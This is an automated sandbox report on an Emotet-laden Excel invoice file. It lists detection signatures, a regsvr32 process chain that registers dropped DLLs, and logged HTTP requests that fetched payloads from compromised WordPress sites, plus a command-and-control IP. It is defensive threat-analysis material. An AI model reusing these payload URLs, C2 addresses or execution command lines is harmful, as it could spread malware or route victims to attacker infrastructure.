Windows Analysis Report
Rechnung.xls

Overview

General Information

Sample Name: Rechnung.xls
Analysis ID: 632078
MD5: 9729363a5cdfee2598f93545b933043e
SHA1: be0c2937e23a7359a04366e9b27ccf1e3c32ee1f
SHA256: 2b0db62c56ce0553d5ba8842a53d17ff5d0b66ad397c3b9565af1cfe48e19364
Tags: xls
Infos:

Detection

Hidden Macro 4.0, Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2560 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2632 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2440 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ITAzDMJQNXvQb\pSYwk.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2548 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1952 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MTAKuNEHAAsvRsb\hgVDSaDXChbCzdU.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1252 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2208 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GistaKepWrpVA\oAaDhgd.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1216 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000008.00000002.1240649290.00000000001D0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000005.00000002.943959485.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000007.00000002.953530856.00000000003D0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000006.00000002.1240847022.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

Source | Rule | Description | Author | Strings
8.2.regsvr32.exe.1d0000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
7.2.regsvr32.exe.3d0000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
7.2.regsvr32.exe.3d0000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
6.2.regsvr32.exe.1fe0000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
5.2.regsvr32.exe.2f0000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
                      No Sigma rule has matched
                      No Snort rule has matched

                      AV Detection

                      Source: Rechnung.xls | Virustotal: Detection: 42%
                      Source: Rechnung.xls | ReversingLabs: Detection: 34%
                      Source: https://173.82.82.196:8080/ | URL Reputation: Label: malware
                      Source: https://173.82.82.196/C01- | Avira URL Cloud: Label: malware
                      Source: http://salledemode.com/tgroup.ge/x4bc2kL4BzGAeUsVi/ | Avira URL Cloud: Label: malware
                      Source: https://173.82.82.196/ | URL Reputation: Label: malware
                      Source: https://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ | Avira URL Cloud: Label: malware
                      Source: http://www.kabeonet.pl/wp-admin/VWlAz5vWJNHDb/ | Avira URL Cloud: Label: malware
                      Source: http://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ | Avira URL Cloud: Label: malware
                      Source: http://kabeonet.pl/wp-admin/VWlAz5vWJNHDb/ | Avira URL Cloud: Label: malware
                      Source: https://173.82.82.196:8080/H | Avira URL Cloud: Label: malware
                      Source: https://173.82.82.196:8080/L | Avira URL Cloud: Label: malware
                      Source: https://173.82.82.196/l | Avira URL Cloud: Label: malware
                      Source: salledemode.com | Virustotal: Detection: 11%
                      Source: vipteck.com | Virustotal: Detection: 9%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dll | ReversingLabs: Detection: 56%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dll | ReversingLabs: Detection: 41%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll | Metadefender: Detection: 28%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll | ReversingLabs: Detection: 58%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll | Joe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dll | Joe Sandbox ML: detected
                      Source: C:\Users\user\uxevr3.ocx | Joe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dll | Joe Sandbox ML: detected
                      Source: C:\Users\user\uxevr1.ocx | Joe Sandbox ML: detected
                      Source: C:\Users\user\uxevr2.ocx | Joe Sandbox ML: detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: unknown | HTTPS traffic detected: 188.114.97.10:443 -> 192.168.2.22:49172 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 159.203.19.2:443 -> 192.168.2.22:49174 version: TLS 1.2
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,4_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,6_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,8_2_00000001800248B0

                      Software Vulnerabilities

                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: RD05UTHGkitvIJt[1].dll.0.dr
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                      Source: global traffic | DNS query: name: vipteck.com
                      Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 188.114.97.10:80
                      Source: global traffic | TCP traffic: 192.168.2.22:49172 -> 188.114.97.10:443

                      Networking

                      Source: C:\Windows\System32\regsvr32.exe | Network Connect: 173.82.82.196 8080
                      Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                      Source: Joe Sandbox View | IP Address: 188.114.97.10
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
                          Date: Mon, 23 May 2022 07:19:19 GMT
                          Server: Apache
                          X-Powered-By: PHP/7.2.34
                          Cache-Control: no-cache, must-revalidate
                          Pragma: no-cache
                          Expires: Mon, 23 May 2022 07:19:19 GMT
                          Content-Disposition: attachment; filename="me435CErJsFGw1q.dll"
                          Content-Transfer-Encoding: binary
                          Set-Cookie: 628b3577889f1=1653290359; expires=Mon, 23-May-2022 07:20:19 GMT; Max-Age=60; path=/
                          Upgrade: h2,h2c
                          Connection: Upgrade, Keep-Alive
                          Last-Modified: Mon, 23 May 2022 07:19:19 GMT
                          Content-Length: 365056
                          Vary: Accept-Encoding
                          Strict-Transport-Security: max-age=300
                          Keep-Alive: timeout=5
                          Content-Type: application/x-msdownload
                      Source: global traffic | HTTP traffic detected: GET /wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: vipteck.com
                          Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /wp-admin/iMc/ HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: airliftlimo.com
                          Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: vipteck.com
                          Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /tgroup.ge/x4bc2kL4BzGAeUsVi/ HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: salledemode.com
                          Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /wp-admin/VWlAz5vWJNHDb/ HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: kabeonet.pl
                          Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /wp-admin/VWlAz5vWJNHDb/ HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: www.kabeonet.pl
                          Connection: Keep-Alive
                      Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 173.82.82.196:8080
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49174
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49172
                      Source: unknown | Network traffic detected: HTTP traffic on port 49172 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49174 -> 443
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                          Date: Mon, 23 May 2022 07:19:31 GMT
                          Server: Apache
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <https://www.kabeonet.pl/wp-json/>; rel="https://api.w.org/"
                          Upgrade: h2,h2c
                          Connection: Upgrade, Keep-Alive
                          Keep-Alive: timeout=2, max=100
                          Transfer-Encoding: chunked
                          Content-Type: text/html; charset=UTF-8
                      Source: unknown | TCP traffic detected without corresponding DNS query: 173.82.82.196
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1240826221.00000000003DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: regsvr32.exe, 00000004.00000002.1240790181.000000000040A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1001580079.000000000040A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1240766444.00000000002D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: regsvr32.exe, 00000006.00000002.1240795899.00000000003BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
                      Source: regsvr32.exe, 00000006.00000002.1240812626.00000000003CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enL
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1240826221.00000000003DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: regsvr32.exe, 00000006.00000002.1240795899.00000000003BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/
                      Source: regsvr32.exe, 00000008.00000002.1240766444.00000000002D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/C01-
                      Source: regsvr32.exe, 00000008.00000002.1240766444.00000000002D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/l
                      Source: regsvr32.exe, 00000004.00000003.1001613039.000000000043E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1240840830.000000000043E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1240812626.00000000003CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/
                      Source: regsvr32.exe, 00000008.00000002.1240766444.00000000002D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/H
                      Source: regsvr32.exe, 00000008.00000002.1240766444.00000000002D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/L
                      Source: regsvr32.exe, 00000004.00000002.1241047566.0000000002E78000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1241047468.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.1240826221.00000000003DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.1241036409.00000000034A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lJWa95VlQ[1]
                      Source: unknown DNS traffic detected: queries for: vipteck.com
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006B24 InternetReadFile,4_2_0000000180006B24
                      Source: global trafficHTTP traffic detected: GET /wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vipteck.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/iMc/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: airliftlimo.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vipteck.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /tgroup.ge/x4bc2kL4BzGAeUsVi/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: salledemode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/VWlAz5vWJNHDb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kabeonet.plConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/VWlAz5vWJNHDb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.kabeonet.plConnection: Keep-Alive
                      Source: unknown HTTPS traffic detected: 188.114.97.10:443 -> 192.168.2.22:49172 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 159.203.19.2:443 -> 192.168.2.22:49174 version: TLS 1.2

                      E-Banking Fraud

                      Source: Yara matchFile source: 8.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.3d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.1fe0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.2f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.1fe0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.2e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.2e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.1240649290.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.943959485.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.953530856.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1241261455.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1240847022.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.935688692.0000000000150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1241152796.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
